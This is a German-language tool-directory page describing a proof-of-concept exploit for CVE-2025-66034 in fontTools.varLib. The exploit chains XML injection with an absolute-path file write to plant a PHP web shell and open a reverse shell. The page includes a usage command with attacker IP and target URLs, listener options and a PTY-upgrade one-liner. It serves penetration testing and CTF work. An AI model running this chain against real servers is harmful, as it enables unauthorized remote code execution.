Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-66034 — CVE-2025-66034 - fontTools varLib Arbitrary File Write → RCE PoC-Exploit für eine Arbitrary File Write + XML Injection Schwachstelle in fontTools.varLib. | Kitploit
Tools/GitHubGitHub/4nuxd/cve-2025-66034
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsPayload-Entwicklung
GitHub4nuxd/cve-2025-66034

CVE-2025-66034

CVE-2025-66034 - fontTools varLib Arbitrary File Write → RCE PoC-Exploit für eine Arbitrary File Write + XML Injection Schwachstelle in fontTools.varLib.

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-66034 — fontTools varLib Beliebiger Dateischreibzugriff → RCE

PoC-Exploit für eine Schwachstelle mit beliebigem Dateischreibzugriff + XML-Injection in fontTools.varLib Getestet auf HackTheBox — VarIaType


Schwachstelle

fontTools.varLib verarbeitet .designspace-XML-Dateien, um variable Schriftarten zu erstellen. Zwei Schwachstellen kombinieren sich, um eine RCE ohne Authentifizierung zu erreichen:

#PrimitiveDetail
1XML-Injection über CDATA-SplitAngreiferkontrollierter Inhalt innerhalb von <labelname> wird unverändert in den Ausgabeschriftartkörper geschrieben, was eine beliebige Dateneinschleusung ermöglicht.
2Beliebiger Dateischreibzugriff über os.path.join()-UmgehungDas filename-Attribut von <variable-font> akzeptiert einen absoluten Pfad. Wenn es an os.path.join() übergeben wird, verwirft es das vorgesehene Ausgabeverzeichnis und schreibt in einen beliebigen, vom Angreifer angegebenen Dateisystempfad.

Die Verkettung beider Primitive ermöglicht das Schreiben einer PHP-Webshell in einen webbasierten Pfad, was eine nicht authentifizierte Remote-Codeausführung (RCE) ermöglicht.


Verwendung

root@kitploit:~
python3 font_varlib.py \
  --ip <attacker-ip> \
  --port <port> \
  --upload http://target.htb/tools/variable-font-generator/process \
  --webroot /var/www/portal.target.htb/public/files \
  --shell http://portal.target.htb/files

Optionen

Abhängigkeiten

root@kitploit:~
pip install requests fonttools

Funktionsweise

  1. Master-Schriftarten — Zwei minimale .ttf-Dateien (source-light.ttf, source-regular.ttf) werden mit fontTools.FontBuilder als erforderliche Master für den Designspace generiert
  2. Bösartiger .designspace — Eine manipulierte XML-Datei wird erstellt mit:
    • PHP-Webshell, die über einen CDATA-Split innerhalb von <labelname> injiziert wird
    • Absoluter Schreibpfad, der als filename von <variable-font> festgelegt wird und output_dir über os.path.join() umgeht
  3. Upload — Der .designspace + die Master-Schriftarten werden per POST an den Verarbeitungsendpunkt gesendet
  4. Auslösen — Die platzierte .php-Datei wird angefordert, wodurch die Reverse-Shell-Nutzlast ausgeführt wird

Offenlegung

Feld
CVECVE-2025-66034
Betroffene KomponentefontTools.varLib
AuswirkungNicht authentifizierter beliebiger Dateischreibzugriff → Remote-Codeausführung
KontextWebanwendung, die einen Schriftverarbeitungsendpunkt bereitstellt

Rechtliches

Dieses Tool ist ausschließlich für autorisierte Penetrationstests und CTF-Nutzung bestimmt. Führen Sie es nicht gegen Systeme aus, die Sie nicht besitzen oder für die Sie keine ausdrückliche schriftliche Genehmigung zum Testen haben.


by 4nuxd

Tool herunterladen
FlagBeschreibung
--ipAngreifer-IP für den Reverse-Shell-Callback
--portListener-Port
--uploadVollständige URL des Schriftverarbeitungsendpunkts (POST)
--webrootServerseitiger absoluter Pfad, der auf ein webbasiertes Verzeichnis abgebildet wird
--shellBasis-URL, unter der die Webshell erreichbar sein wird
--no-listenAuto-Listener überspringen — stattdessen manuelle Befehle ausgeben
--pwncatVerwende pwncat-cs anstelle von nc (bevorzugt, falls verfügbar)
  • TTY-Upgrade — Bei Verbindung erzeugt das Skript automatisch eine PTY über python3 -c 'import pty; pty.spawn("/bin/bash")' und setzt TERM + stty für eine vollständig interaktive Shell